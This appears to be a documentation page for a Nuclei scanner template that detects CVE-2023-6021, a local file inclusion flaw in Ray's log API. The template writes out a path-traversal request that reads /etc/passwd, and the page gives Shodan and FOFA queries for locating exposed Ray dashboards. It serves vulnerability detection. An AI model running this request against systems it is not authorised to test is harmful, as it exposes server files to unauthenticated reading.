Skip to content
Nuclei Templates

Ray API - Local File Inclusion

ID: CVE-2023-6021

Severity: high

Author: byt3bl33d3r

Tags: cve,cve2023,lfi,ray,oos,ray_project

Description

Section titled “Description”

LFI in Ray’s log API endpoint allows attackers to read any file on the server without authentication.

YAML Source

Section titled “YAML Source”
id: CVE-2023-6021


info:
  name: Ray API - Local File Inclusion
  author: byt3bl33d3r
  severity: high
  description: |
    LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.
  reference:
    - https://huntr.com/bounties/5039c045-f986-4cbc-81ac-370fe4b0d3f8/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6021
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6021
    cwe-id: CWE-22,CWE-29
    epss-score: 0.0038
    epss-percentile: 0.72895
    cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ray_project
    product: ray
    shodan-query:
      - html:"Ray Dashboard"
      - http.favicon.hash:463802404
      - http.html:"ray dashboard"
    fofa-query:
      - body="ray dashboard"
      - icon_hash=463802404
  tags: cve,cve2023,lfi,ray,oos,ray_project


http:
  - method: GET
    path:
      - "{{BaseURL}}/nodes?view=summary"
      - "{{BaseURL}}/api/v0/logs/file?node_id={{nodeid}}&filename=../../../../../etc%2fpasswd&lines=50000"


    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - "root:.*:0:0:"


      - type: word
        part: header_2
        words:
          - "text/plain"
          - "aiohttp"
        condition: and


      - type: status
        status:
          - 200


    extractors:
      - type: json
        part: body
        internal: true
        name: nodeid
        json:
          - '..|objects|.nodeId//empty[0]'
# digest: 490a00463044022046e4ec0538391fd9673e708ac6eacf3709de716008edec1831e850fd330de6c102206fbacca301bf837526c507e1beb9d27e6669c3e8fe068392cf1d67e22d704e37:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-6021.yaml"

View on Github